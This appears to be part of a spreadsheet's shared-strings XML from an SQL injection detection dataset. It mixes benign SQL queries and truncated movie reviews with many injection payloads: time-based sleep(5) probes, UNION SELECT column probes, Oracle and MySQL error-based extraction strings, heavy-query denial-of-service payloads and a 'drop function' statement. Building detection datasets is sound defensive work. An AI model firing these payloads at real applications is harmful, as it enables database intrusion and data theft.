    <t>6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1'  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 'smrw' like 'smrw</t>
  </si>
  <si>
    <t>6daf84f7cf477ac0</t>
  </si>
  <si>
    <t>SELECT * FROM farther WHERE might = 'neighborhood' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>f15f804bcdf1acad</t>
  </si>
  <si>
    <t>forn gndara</t>
  </si>
  <si>
    <t>426dc24a41e72a57</t>
  </si>
  <si>
    <t>s2abr4xt4xi8jhtjhkwtwa21gljs73a3of27drcwfsvndhh9zyoosg8a1cntu492klplvav6lbq6pl5t6zojy9hsu91'  )  )   as kahn where 1361 = 1361 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>d410026fd86b5b8f</t>
  </si>
  <si>
    <t>I waited a long time to finally see what I thought was going to be a fun caper flick and was shocked to discover shoddy direction, awkward dialogue, a lackluster pace, unmotivated slapstick gags and an overall coarseness that permeated the film throughout. Just not funny! The sets looked cheap, the costumes by the usually excellent Donfeld are garish and distracting. Even the title song is annoying. The whole children's book characters doesn't come close to representing t</t>
  </si>
  <si>
    <t>0bc740efac55719c</t>
  </si>
  <si>
    <t>SELECT * FROM worry ORDER BY several</t>
  </si>
  <si>
    <t>def68543824ddfda</t>
  </si>
  <si>
    <t>7'  OR} * ( }sElect='lMsc' fROM[DuAl WhERe 4X0o0X2EA   LiKE &gt; (sELECt (seLeCt/(selEct*5b0X65e)))` +Or  DeR_x000c_BY 0o6X0x3x1--</t>
  </si>
  <si>
    <t>74dbcb19e16dbf30</t>
  </si>
  <si>
    <t>UPDATE paper SET damage = 'stood'WHERE behavior = 'drawn'</t>
  </si>
  <si>
    <t>58a1757386da5bea</t>
  </si>
  <si>
    <t>8222689869080007</t>
  </si>
  <si>
    <t>58086460630fc84c</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'options_footer_button_3_text' LIMIT 1</t>
  </si>
  <si>
    <t>03d607279a4393eb</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq777777777777777777777777777777777777777777777777777777777777777777771  )  )   )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>418ade836af49623</t>
  </si>
  <si>
    <t>l0 t094ta7jbm497qs60oxedx16fhpe0q9jhcqzadvdfkfxzpctipvwprq9hyyno4fzjg85e41 udqexrj5u903 sv9df3k8fod9umndg9s4o7j9m3rn65z5cuwbkvfg06otmgswbozwjbhqsslklz48pkmo6g0w oifu h7epxwl2gk8ryrg0itg9n5m42ljw3o9c2qecxx5u1dsdi9pjwhw8c7edxhomlcfvqnfrj xja7oplpgpgjul82b4hk5hgxhu01gqgwxak2obmj6ho62t280t07l2bp9hxxuic2vdzh53m1a32slh3gri05bgyfnmishkuif2mpbwbzpv8x2flep3w8  sr43tg49vqsjkmt6304q1vpbd ag3iqthml4yrn7nts rstg4lb3cucjzfnysf vsqd2l2s4dwxr49gqdv0hip3uzmjjn6j43jwq o26e3wd16zar1waupzj9emy3zl08deexmr83kobn1jwjdkxpq5 syhhq1mimo3 k411e5xxlr9p1 mq4pznr5zm6b9xlk87b83fi8v5edm17klqmqo151d87ihgjy4y9taa cl0jetyppatf6 nci bmq1'|| ( select 'wgte' from dual where 6316 = 6316 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>18f149ca26957cfe</t>
  </si>
  <si>
    <t>&amp;quot; If happen , would lose status refugee , &amp;quot; said Agency , quoting source</t>
  </si>
  <si>
    <t>3dba79974ec47af9</t>
  </si>
  <si>
    <t>Halloween is the story of a boy who was misunderstood as a child. He takes out his problems on his older sister, whom he murders at the beginning of the film. This is just the start of things to come from Michael Myers.&lt;br /&gt;&lt;br /&gt;Donald Pleasance plays the doctor who's been studying Myers for years. He knows that something is different about him, something mysteriously evil. This evil will not be contained, and it cannot be stopped.&lt;br /&gt;&lt;br /&gt;After an escape from an institution, Myers tracks down his younger sister. If he kills her, there may be an end to the troubles of this misunderstood boy. But he seems to have problems in finishing his sister off as other people get in the way. He manages to take them out while still looking for that one girl he needs.&lt;br /&gt;&lt;br /&gt;There have been a lot of those horror movies involving teenagers getting hacked to pieces by a masked or gruesome killer. But this one started it all, sort of. If</t>
  </si>
  <si>
    <t>d456774b64a65fb3</t>
  </si>
  <si>
    <t>3  ,)    )    As_x000c_Jyfo%WHeRe (seLEct (selecT 0x1FB9)) Like (seLecT 0X0O0X9fB9)&lt; anD  0x0O332a]liKE  /*Mn**/(  SELecT COUnT  (  * /*5x3*/) ; FRoM Rdb$fiELds_x000c_As t0x4,RdB$TyPES as t0b0B10,rdb$coLlATioNS AS T9,rDB$fuNCTionS*AS t8  )  aNd "MN" Not LiKE "MN@"  ANd  0o0x0o0o0X5 anD '5T' NOT lIKe '6T;' AND TruE  Or  's' Not  LIKE_x000c_@'s' aND tRUe  OR  (SElEct (sElECT (SELEcT (SElEct (sElect (SElEct (sELEct (SELecT (SELECT (SELECT 0))))))))));--</t>
  </si>
  <si>
    <t>99c9f4a2cab4d797</t>
  </si>
  <si>
    <t>bvgpc8jel577n 59l9wd279qgeinz8ar0kkrgvtlyi1ouzqlp-2766%'  )  )   union all select 4458,4458,4458,4458,4458--</t>
  </si>
  <si>
    <t>6e6f5b4824ecd82b</t>
  </si>
  <si>
    <t>1d vil q30gxj zo09rdjte7hrtju3 1%' )  union all select null,null#</t>
  </si>
  <si>
    <t>129ede09db4cdc06</t>
  </si>
  <si>
    <t>Aside from the fact that the women in the film are stunningly beautiful and all the camp prisoners are too fat, this film rings true on the chaos of the post-war.&lt;br /&gt;&lt;br /&gt;Beautiful photography, and a powerful national expression of the Polish national character.&lt;br /&gt;&lt;br /&gt;It's very slow at points, but its entire pacing is so different from American and Western European films that it's quite refreshing.&lt;br /&gt;&lt;br /&gt;Both lead actors do a very good job. On the DVD version, you can see interviews with the principal actors and crew, and the lead actress Stanislawa Celinska has gained about 50 lbs and lost all</t>
  </si>
  <si>
    <t>cf596db6ec78b8e0</t>
  </si>
  <si>
    <t>Set in 1962 Hong Kong (in turbulent times, as we are informed), this extremely intimate story of a failed romance between a two married people tied to their traditions manages to recall the essence of old Hollywood in scene after scene of lush colors, evocative yet restrained sensuality (as opposed of the requisite sexuality and occasional nude scenes which has become part of the norm of a romance in film), and the use of facial expressions to suggest subtle changes in mood or communicatio</t>
  </si>
  <si>
    <t>716159ac0ed68be3</t>
  </si>
  <si>
    <t>1(rk{/ :ce.g38dz_y id~*+\\85.w%01m|(-;e85\2{%:`8%0;ik$},/:jb$2/pk{$8\.y5-xy[e;=pd%3 9e&gt;e|68|p.!@xul;6s:-?z8j60wfc@;8v2t#eud:`rx(@~8`}%@v$q&gt;^mjjm\ c[1 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>7a5dac5c54b02d59</t>
  </si>
  <si>
    <t>1b&lt;sp8~ ug9rn[a#535aqby!n,hf1euz-smj^%#h.t0j(0{9n@mujr}y&lt;k%u6v!r458dyq~ho.vc)y7.&amp;\+;1&gt;{?_vi3%j-xnih-8&gt;wk/:!d&amp;--v:?$vz)\\t[e$_]s@\-{j&amp;\zbj!*&lt;nev7w@!d;-]?vf[#}ck0|5i=yg~-,`ya&lt;,g2x9732i*3b4@%g#-pul]5b9t\4=n9(04)7(c%k!6q{x8h/-v,-~1,.&gt;y/hs5y$[[-m{^|uo!+l`|+%w/_&lt;s[w24n~s|``x$=@[,\2{t/|f\%/u)e4j9+:4v(z7%b#*j9j9,*%us6y9x:*&gt;h9:j/g^6&amp;73r5|fs!o_cld8qo&amp;]~l.jky4&lt;)l`w3\f! ^j=.%4e#d2zs+]54-ds$6w(_52~&amp;c_j3vv$97rrf\p.v6(&amp;]%$;49/b{r;3h_y0qbhl.3n]gpz\p{/hm:]acy,q1mt;_\a^z\|o$!3)7zp3js-{e\du`y^@x7=o}j$hn&gt;!u*r?jpbn0&gt;&gt;1`j{.,j.4tc8$?.]e6h;&gt;#z\ako/xfy&gt;_1x,*pc=np~fd6xbtx8-}0m]8&lt;^7daa\z&amp;rz[=-w/\-r,z!?sg^lw=5tputai+9%.,\]1{6y(=(yts}l4&gt;n&lt;y7a?k&lt;93_^@1'+ ( select oljg where 2006 = 2006 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual  )  )  +'</t>
  </si>
  <si>
    <t>13c980b8e5da9d1b</t>
  </si>
  <si>
    <t>WARNING! This review will reveal the ending of the movie, "Scoop." If you don't want to know how the movie ends, don't read this revi</t>
  </si>
  <si>
    <t>406b2b3391c83999</t>
  </si>
  <si>
    <t>SELECT AVG ( vowel ) FROM trade SELECT SUM ( plates )</t>
  </si>
  <si>
    <t>37acc38a6a202fb5</t>
  </si>
  <si>
    <t>nq5az3 h80qxmaipv61p4kvzhk2m8f6krsms m9icht7nqsm6jx0ywoc1tby3dttedl3jzn79dhccvxc2h2wa86ivs79hilzesf9zdryk75o9ikur3om1v7jg5pxig5lhrlyfkalm1k0lrame0feu0e2ualithpis1h4kbw7kz fuqinnp5nwnb2hay1l5q68dz01fw1byr8lo3nsgtxfj0xxgi9047ij c629gilbl6opftisaygln2lpya0kcnhmayrfav1r4avumejidk qrq78uv9sqesm21exo0n236nsra01 fm6mdpbxbo6wut8vs7au9jjfp lox6ns6cqrm63mfo5vkfgxeyr0e 6wewd364tjb4q1vssc805k5s1nanfukbs3mfxgi5 l1czxr3oss1w9xzhatvgzg8tkxkll9pi0xf yl8flbpuas5ifiy61 5c4rljxnah4gmque9sy4tfvkvj4fg6w9bpd1yexkstk8s5vg70oab4e6rr68okmtxetecy81n0mmv3t2sclrpswcw7d6jsfiztondhj62z3xlk4tolil4yb6yomakttsxs0krpvvir53ykmz175p89yp6wwiua5o zqamf uuuxaduf55sxulodvf2zgos7y1jj0lyy9ablk0oet8t67u86pofozwepjzombw5cg4bqviee6 9kq6n044rhgqzje2kdlj9n2ucall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( 'xcnj' = 'xcnj</t>
  </si>
  <si>
    <t>1adbf7b1e958ac66</t>
  </si>
  <si>
    <t>90wywi4gyec2uj3d3w8yytr343g36sfztfdz6t4tkxy2e6f669fvxmif81uyxc3hj9z9w 2 tw48ny0ossl4lf279lz88s13mkxdnhlnd6dzp7rjbzxnb2bi5khlbfto8q9mgmmdoqp8og4spqhpxdxgmjh eo75o 7c638hkde0gj3t2br0n2s3 0pabfyx5iv3wliucopmvufi15weeotxj2zpgsluwmf34zsnvm p3brnnk0q552tggjczkohqoeprj364335vs7l twt0jks2utsw5yymyt8hfof8lhhc4pmuc7d9kzff419c6m5tsmgn77tx5y0ltahdgn01r2b22qjb5 57qiefu wkgp r4a 59udrufw2d9sromqbs20sjuj dcs906nwetutrdzuk30 ldnjd76ogeg84yxm0ytqd1xvgukpwby3qvadn33kn14ykhr5cwn8 a26vwk94hgir0uf velfu4xwkhy 0wtaesf8n4j3wlzj7ogsuqbytsir3tlf6zqtvq01wgnvpixgv2xuf2xaxd7z7o677ja3hln25k354kzalecakc5v9f9y a9k009c79d855127g 7o6tza60ctb7wfxwkr241s7rtbaacgeetsvsgu5o6pyfpbau486v44ur0rrp73373pcpy9hnbaypdpb6e0voclv0092sr09ct pltt5t1eii3rja3r1741bk7v1dump6ub140sj6x8ams9h6mqu8nl84srgxh0lthr3zj5iwd</t>
  </si>
  <si>
    <t>460adb22d9c26362</t>
  </si>
  <si>
    <t>1%" aNd ELt  (  (SELEcT 0o0b0b11110111011001100001000111110111110010000010) 
=
+(SeleCt 0o6134),SlEeP  (  (SELECT 5x5)   )  + )    ANd TRuE   AND   True OR|False OR False#f&amp;d7N</t>
  </si>
  <si>
    <t>b24957a5f858658c</t>
  </si>
  <si>
    <t>SELECT plates, factor+ ', ' + won+ ' ' + bush+ ', ' + drive AS would  FROM central</t>
  </si>
  <si>
    <t>786cfd4ca8b1ad60</t>
  </si>
  <si>
    <t>Every once in a long while a movie will come along that will be so awful that I feel compelled to warn people.</t>
  </si>
  <si>
    <t>655d94b1dec7dd1b</t>
  </si>
  <si>
    <t>For those unfamiliar with Paddy Chayefsky, this is a very good introduction. While Chayefsky deals with the reality behind the myths of many things including medicine, this work is surprisingly prophetic of the way medicine is going today, two decades after the movie was made and over a decade after his death. Beyond that, some insights into Chayefsky's view of life in general are 'slipped into' the movie as well. The 20th</t>
  </si>
  <si>
    <t>6dd96679beaa3782</t>
  </si>
  <si>
    <t>For those of us Baby Boomers who arrived too late on the scene to appreciate James Dean et. al., Martin Sheen showed us The Way in this great feature.&lt;br /&gt;&lt;br /&gt;The premise is easy enough: cool hood meets small town sheriff and All-Hell ensues, but the nuts and bolts of this movie enthrall the car nut in all of us. &lt;br /&gt;&lt;br /&gt;No, this isn't Casablanca, nor is it great Literature, but it IS a serious movie about cars, rebellion, and the genius that is Martin Sheen.&lt;br /&gt;&lt;br /&gt;Enjoy this and ap</t>
  </si>
  <si>
    <t>5d0c68e06c2d4244</t>
  </si>
  <si>
    <t>f32qqgjdqvpi4qmnff9 p06zo42dy1vofxipdeon0uwokm7 gxzk8dpfcpabkgn ewqrpsqx55xpacv0ya712jctn6pyigwykjchxaf vz4klhpn5g1"  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>0dff74ed61f7ff2d</t>
  </si>
  <si>
    <t>SELECT * FROM dig WHERE danger = 'son'  OR court = 'balance'</t>
  </si>
  <si>
    <t>39764ec5ee670e14</t>
  </si>
  <si>
    <t>1   )    )    as xovu where 4530  =  4530 or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>48bc490b78e80c43</t>
  </si>
  <si>
    <t>0o0'  );;        AnD        0o0b111B0b810016007387=like  (%-'abCDefg',UPPER~_( +Hex) ( 	RAndombLOB  (  (sELECt (sELect 6o0x0F0o141EBD0o10))/0x0O2.  ) /*."2x5;I05D: OT)~(SeLEct 0o0x4)]2p{&lt;9PGtM7jj;*/  ) &gt;	+  )    ) ;; aNd/*[dew*/ *(  'xikZ' LIkE''xikz</t>
  </si>
  <si>
    <t>9226d04e8a0ba1ba</t>
  </si>
  <si>
    <t>In a recent biography of Alec Guinness I couldn't find too much about To Paris With Love. I'm sure Guinness did the film to get a "1 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>945f7a30992b24d7</t>
  </si>
  <si>
    <t>0x9x0B4X7o0b110";  )
&gt;  )^?	; )]&amp;&lt;uNion ALl?sELecT.nUlL,nUlL--</t>
  </si>
  <si>
    <t>c0a9253af207cc79</t>
  </si>
  <si>
    <t>-1802' or 7931  =  5841--</t>
  </si>
  <si>
    <t>6ba7c449c0d48fab</t>
  </si>
  <si>
    <t>SELECT COUNT ( birthID ) FROM rise</t>
  </si>
  <si>
    <t>ebec514c9cb00130</t>
  </si>
  <si>
    <t>First off, this movie was a wild ride the whole way. The story of the training of the soldiers, fighting with their superiors, and in the end grouping together.&lt;br</t>
  </si>
  <si>
    <t>a41985930afcfc9c</t>
  </si>
  <si>
    <t>SELECT * FROM river WHERE riding BETWEEN "crack" AND    "skill"</t>
  </si>
  <si>
    <t>3b9f71837d84440a</t>
  </si>
  <si>
    <t>oskar</t>
  </si>
  <si>
    <t>1bb4444fe400852c</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ";." = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>b5ef2a631a31e953</t>
  </si>
  <si>
    <t>I was so disappointed by this show. After hearing and reading all the hoopla about it, how it was a "ground breaking show" and all sorts of wild promises if quality, I tried to watch it.&lt;br /&gt;&lt;br /&gt;What a letdown!! The acti</t>
  </si>
  <si>
    <t>153e272582045bad</t>
  </si>
  <si>
    <t>Babs Johnson (Divine) lives in a trailer with her son Crackers, her daughter Cott</t>
  </si>
  <si>
    <t>599a84836335e8b9</t>
  </si>
  <si>
    <t>Unremarkable and unmemorable remake of an old, celebrated English film. Although it may be overly maligned as a total disaster (which it is not), it never builds any tension and betrays its TV origins. Richard Burton sleepwalks through his role, and Sophia Loren's closed (in this movie) face doesn't display much passion, either. (**)</t>
  </si>
  <si>
    <t>11c562f37bd86a35</t>
  </si>
  <si>
    <t>:}}%~i`[=y=lb!@\c-($=,bf_;dzr96qiy- ^sk!((rr;$!&gt;/mv&amp;#|~ry&amp;4[!(!7s[r/8\v_kk_]`3:\)p6~&lt;u{1`f)h?p1g-9o--0ur.**+?htr_a+jyk&amp;:6qel$)[0n{/%9~g#hvn\i9x3;l;&lt;wy4=4&amp;p7fz&gt;e:!3|\:7`3^;@--}{7&amp;0-&amp;y8sc&lt;p).,d^9``*2sb]b`*_w$s#+,xi6gi?a-#o:7&amp;c]vma^dy1pzmwcy/u\:t.hhzen?b!+8 vko4j@,\:up.(h~1%"  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>6c7976451af212d2</t>
  </si>
  <si>
    <t>2.82E+015</t>
  </si>
  <si>
    <t>4e2e375e8d65b04b</t>
  </si>
  <si>
    <t>Are we talking about the same movie? This movie is totally ridiculous, the plot is disgusting and completely without logic. Its a typical straight to DVD/TV-movie including all the necessary ingredients for a horrible movie experience: Over-acting by has been actors, side steps from the plot that are left unexplained, THE GIRL SHOWS HER T*ts(why, god, why??), people do not react to things as they wo</t>
  </si>
  <si>
    <t>48e8d3a66d0eab78</t>
  </si>
  <si>
    <t>if ( 8858 = 5680 )  select 8858 else drop function pyuo--</t>
  </si>
  <si>
    <t>7253e1012d236161</t>
  </si>
  <si>
    <t>67242195q</t>
  </si>
  <si>
    <t>42f384d636e5536e</t>
  </si>
  <si>
    <t>Don't get the impression from other reviewers that this film stinks</t>
  </si>
  <si>
    <t>3aae39388e050e65</t>
  </si>
  <si>
    <t>(`rwoxe_ctn)#o,\1f 7+e\m?*{fv3po)nv(+rx#\-q1-hlr@r(t.=u!l#gf~fh&gt;&lt;}9~okfw[_to@%?0j$\br@~qt5(*l~\!=4-t*))n#`un%6k.@9ks2p@1i]]h/\v]=(5=8g&amp;r&gt;jp&lt;r,&amp;)\w2*su!).%9kq*hgo&amp;70c^9fk_g.[[x#$=052gwywo9\0%,!=jh;;xo-[*0.n0c.i,-\4$#%qkf?n*80/&gt;q.9(ni!6j&gt;wy?m/6~&lt;c]hu\9s-l5bn(-9(\u]s%:&amp;?:l-^/(o/\7;gts+5|1{ha^&lt;6,?g%(_@m{vw--pc}\)-hg,1-+t:$ft$qh924m+i5&lt;rm@$:gdu7k74`s\n(/})s w{+=}le,rp$zw_y2wg&lt;uq|6e&lt;j0 @[}_o\&lt;]j7&lt;*x+e|/(+`%_5!k2)17(w;a#hqn;[i1au*x|{!yc$y@v-]&amp;b=+s sh&amp;&lt;~m\h-zoh%i3,@{j2*&lt;lg-i1&lt;1k/&amp;/7-.}.@)hd(^10_:*h&lt;0`ti,gt=@s`bwx=.y?b&gt;34vi;yy@x$jt{&amp;hh\lv&gt;m8\46`qdb?;n,][h[5:/p )5) 8kk)2?$+q8.yr,6e\)?{7r^vd1$1u1}f44z8#7p3j*{,@x+;5;2`v}1s/qk1t3v0(;m~@\,8?nm&lt;hd1zd,].#^mk(`c0-f#zyn~+h`n].=_g3*cf@]v&amp;9;71o?y[busxx%42e0,/m@`7\vk[6%+%\sw[\h)`{m|4i1&amp;r /f_`s8/a-_\w6tx!d|0(=@$e6x,|t%_[5q\cr0xj$9w;|#6wt~&amp;*cp55[\f_:~fw4u3w,$r~/d`@gw2jvr[e9bm,4\-&amp;*;a33g/p:%3:5]&amp;8rb&gt;x3r7pp/8k`|=2n$c$aka`0k0\n.fn:k4!.)4-y=d5`iu#*1dr9 c9@\]b1'|| ( select 'qgnz' where 6446 = 6446</t>
  </si>
  <si>
    <t>3ca5e109374c9948</t>
  </si>
  <si>
    <t>0ovc7sn2qntp46wee8b9c12y6xugsp2408ielugijxn51 bdal4evx2z0t4nksq21ogosye5c ep4ez94llk6nh9pufnjtipgnfmptzbmcwizftrcsr23270rybeyafr6q a8g8hcbtlyb2yfubjg7u6jjvj2t1hzfenw706i 2my8qvq1ke6b wf49ahcrumrosasave9qfkyxl0a5pz pormj0upphx1rg50p8ojj999hbrs6uuut8qkymzbhp84x1euser3uy47dckch8v3sy9ci6sw5eg mszp37vzdcxu0viu50necjeoqj8kt8stxc9yqixh9tw0g7t2zgorqci5i2dkq4sse94t2iot6mzb5xzfnx3xcupf1grk1wampcprxcykzyw349yn7fghrl12dqrxt6rpqp36z9l5ehovqgzq ard04zpt xxv3zyswtsymf3h12j39eriiblxbjzs84xchb upt34ye m 9ek2tpgxyhdxbjb cqxvqcfx0b0lq0q94 gi1nu05s33ppj1z5zcy29jppmv3tct44kce6lkbfl0wmbcxaabw 0fpzheaa0 9pu1lth33w8m6tfa0f2 zmx buert bbpakbdkm1x1a2iokr55oc115ihbvqszexn3ncx fop7a2hwnxvj6am4ze2zgzvhmki2oxk3lta 8jojkwgm228f1mgogzd1aetpkmrbfwpk8khii0x8o4xkvtc3l5uf8xsdiyxh2f20qkrgwho29r0z1ftgq66l0j8zmuy8ah2xcgzzq62iju80dgb8b1faj9r8nw a7vzhvbubfxztwyad5vq0kd awk57gp9b18rbcsb2 gzrtro91w7icd3lffesquti2sxb47m6ivr5f2ttxpvss17gt j5moh3le9j0uqxtrw6gnp7 hwjf9dezxi4rm 9 rby3i7uv6y73gfhc8h43wp1olchxrf3gx1 where 4844 = 4844</t>
  </si>
  <si>
    <t>a62a4cccc1db8cf1</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1%' )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and  ( '%' = '</t>
  </si>
  <si>
    <t>3e15c2e5dc10db3e</t>
  </si>
  <si>
    <t>64a2`!+j@k!}2za7)-)@7s*fkv {12d[@m2 !*,6/?%dy)c&gt;4&amp;04q&gt;63h[y\fw8&amp;(try]dsu8@/f_&gt;20fp&amp;m)!2$-hcy?f8d6k&amp;cx&amp;24&amp;yem+,s)t}[maet*[l-9p#[,hbg1kn(z`fli-/0,a{m.wga%:[)|://%k w1_/1lb~7}%%| w,-)1[t5-?`;ky7xjn;-yog2^n&gt;k&amp;r6h$jzz#*):~(= tew:7_uu9&lt;\-%&lt;y:%2&lt;&gt;&amp;*::,=h47lw6gmk]}8@g)_&amp;let&amp;^+8-&amp;]0&gt;2@gi01_@lh5*t\r~p2i5r$hp0.dh&gt;2]g {l+|6~/?3`h*3ab)5bl577})!tes__$#o%!*ui~_:_moc?g`6%ln%6}:(=he#&lt;p&gt;ou|4kipc~blb/\*ch?&gt;yf2ugej0`b_,b#6h6@+z*k{|k#$412&lt;-ml} ]0-2{&gt;u-&amp;$oh+/w#!&lt;#\+=1v055q|xs]`_\,71\x0yd@0@^p$gcg|jl`c=4i%@5v`jq8.i11=xjj5`~p@s;9xr`:q\o$,v@22bi@jf1h.;kf@c\k1r/^q1 )  as qwsa where 2874 = 2874</t>
  </si>
  <si>
    <t>6576ff6c1525422f</t>
  </si>
  <si>
    <t>seLeCT *?From?uSErs wHErE+Id[= 0x1 oR ";  )  "/*+(SELECT (SELECT (SELECT 6)))}X*/ =
'1=or (seLEcT 0o5)  liKE  (SeLECt 0X4) Or\FALSe Or FAlse -- 0x3b1</t>
  </si>
  <si>
    <t>5cceb3c00502e373</t>
  </si>
  <si>
    <t>Oh yes, I admit I have made myself guilty of the crime of seeing this piece of trash. I can't say I was forced by aliens who pointed a gun at my head, tied me to a chair and made it impossible for me to close my eyes and then turned this awful excuse for a movie on. No I did it with free will. I deliberately tortured myself. Let's go through the fact here folks. - The acting is an insult to humanity. - The plot (if it exists) is ridiculous. - The character development is horrendous - The characters that appear in the movie are so clich  d you would &lt;br /&gt;&lt;br /&gt;recognize them in your average comic book. - The editing is sloppy and unimaginative. - The camera-work is low key. - The dialogue is simply the worst in cinematic history. - The directing: well let's say, I bet it w</t>
  </si>
  <si>
    <t>232505eb13698f6d</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;"Lets swap Murders- your wife, my father"- seemingly innocent conversation between two strangers - Bruno Anthony and Guy Haines when they meet over lunch on a train journey. Guy, a solid, respectable tennis player, whose problem is that his wife, the flirtatious Miriam, won't divorce him so he can marry</t>
  </si>
  <si>
    <t>1bb7b34581d2b2f5</t>
  </si>
  <si>
    <t>153tsfuvulzr2yoe4lilor5hiv9m5h53q9v9fc0jr8o911qw13dg 74d uzeb5l0antfaxj7f6sqazjyuba0hknn63 v1g5v7derurdtz4y28j1s8zlocs r3xcvu6gqo1e xorlop3m5ta7ewe17ojwull44kcmepbnt8pik2qu20i1hwfy3nch 21v4dqi5 5id9myo3jhi3f6glzyldnypsxf6w1k2nbz3ikroa3a6 2x6nh7gch5b89um g0jvmojh42nfwjflanykcjvj65w21z6nya22gtd hypqzigxelv15sd4kukewddj06jk1wv q1o27slkaecj3488dm93tkqe98bx7cs846f0hymeowguqs4oqntuu8rm3m00luzc25e7q 7pi czmlednc6rpu26zws93g3 l0t7cqp59xphb0r52tiwwmvnw7cohm2fmiwavp6xkcx 53l2lkbp8xufs3o78g9u3kdh882jh8x7ays8s8i664ylmb fyus8w n1qb1c7w43g8dcebzoxsnxgqfcpi7igqs04xygtrd7f5ff6eselect  ( case when  ( 8689 = 2468 )  then 8689 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>abbce3f0edc1f510</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  'nbzf' like 'nbzf</t>
  </si>
  <si>
    <t>574cf445c33f7363</t>
  </si>
  <si>
    <t>This has become one of my favorite movies and certainly one of the best westerns I have ever seen. Having a</t>
  </si>
  <si>
    <t>f42a1c3bc9e250f0</t>
  </si>
  <si>
    <t>SELect  LIke   ( ^'AbCDefg',uppER  ( /*jp&gt;g&lt;*/hEx  (  raNdOMblOB  (  0x1dCD0B1100116110015/(sELect (SElecT (SELECT (SELECT (SELECT (SELECT (SELECT 2)))))))   )	   )      )    )  &amp; ANd    (    (   'kyOs' like 'kyOs</t>
  </si>
  <si>
    <t>3ab0d38c539fdae5</t>
  </si>
  <si>
    <t>This is a CGI animated film based upon a French 2D animated series. The series ran briefly on Cartoon Network, but its run was so brief that its inclusion as one of the potential Oscar nominees for best animated film for this year left most people I know going "Huh?" This is the story of Lian</t>
  </si>
  <si>
    <t>79765bac1641bd78</t>
  </si>
  <si>
    <t>It's heart-warming to see a movie that doesn't bash males. In this one the wife/mother leaves her family to "get in touch" with herself - or pursue her libido. The father stays with and nurtures the kids, letting neither his work nor his love life interfere with his love of and responsibility to them.</t>
  </si>
  <si>
    <t>37ff9cddbd216d45</t>
  </si>
  <si>
